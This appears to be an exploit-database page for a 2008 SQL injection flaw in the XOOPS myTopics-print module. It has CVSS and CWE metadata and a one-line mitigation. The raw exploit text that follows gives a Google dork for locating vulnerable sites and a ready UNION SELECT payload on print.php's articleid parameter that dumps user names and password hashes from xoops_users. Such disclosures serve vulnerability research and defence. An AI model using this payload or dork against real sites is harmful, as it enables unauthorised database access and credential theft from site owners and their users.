header-logo
Suggest Exploit
vendor:
myTopics-print
by:
S@BUN
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: myTopics-print
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

XOOPS Module myTopics-print SQL Injection(articleid)

A SQL injection vulnerability exists in the XOOPS Module myTopics-print, which allows an attacker to execute arbitrary SQL commands via the 'articleid' parameter in the 'print.php' script.

Mitigation:

Ensure that user-supplied input is properly sanitized before being used in SQL queries.
Source

Exploit-DB raw data:

###############################################################
#
# XOOPS Module myTopics-print SQL Injection(articleid)
#
###############################################################
#
# AUTHOR : S@BUN
#
# HOME 1 : http://www.milw0rm.com/author/1334
#
# MAİL : hackturkiye.hackturkiye@gmail.com
#
################################################################
#
# DORK 1 : allinurl: "/modules/myTopics/"
#
# you can add expliot after mytopics
#
################################################################
EXPLOIT :


print.php?articleid=-9999999/**/union/**/select+1,char(112,115,101,114),0,concat(uname,0x3a,pass),0,char(117,115,101,114,110,97,109,101,58),0,0,0,0,1,1,1,1,1,1,1,1,1,1,0,0,111,333,222,0,0,0,0/**/from%2F%2A%2A%2Fxoops_users/*%20where%20admin%201%200%201%20

################################################################
# S@BUN                     i AM NOT HACKER                S@BUN
################################################################

# milw0rm.com [2008-02-18]